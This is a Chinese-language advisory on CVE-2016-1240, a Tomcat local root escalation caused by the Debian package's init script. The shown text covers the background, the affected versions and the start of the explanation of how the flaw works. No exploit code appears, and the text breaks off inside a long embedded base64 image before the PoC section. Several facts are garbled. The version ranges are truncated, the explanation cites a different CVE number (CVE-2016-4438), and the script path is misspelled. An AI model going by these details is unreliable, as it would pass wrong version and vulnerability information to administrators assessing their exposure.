CVE-2016-1240 Tomcat 服务本地提权漏洞

catalogue

. 漏洞背景

. 影响范围

. 漏洞原理

. 漏洞PoC

. 修复方案

1. 漏洞背景

Tomcat是个运行在Apache上的应用服务器，支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展，实际上Tomcat也可以独立于Apache运行。本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限，攻击者就能利用该漏洞获取到系统的ROOT权限

Relevant Link:

http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

http://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247483675&idx=1&sn=4b3333c9a16e2e29c6fed72ad45e0787&mpshare=1&scene=2&srcid=1007lydwyCzkOlwg6aH218Wj&from=timeline&isappinstalled=0#wechat_redirect

http://www.freebuf.com/vuls/115862.html

2. 影响范围

Tomcat  <= 8.0.-

Tomcat  <= 7.0.-

Tomcat  <= 6.0.+dfsg-~deb8u1

受影响的系统包括Debian、Ubuntu，其他使用相应deb包的系统也可能受到影响 

3. 漏洞原理

Debian系统的Linux上管理员通常利用apt-get进行包管理，CVE-2016-4438这一漏洞其问题出在Tomcat的deb包中,使用deb包安装的Tomcat程序会自动为管理员安装一个启动脚本：/etc/init.d/tocat*

aaarticlea/png;base64,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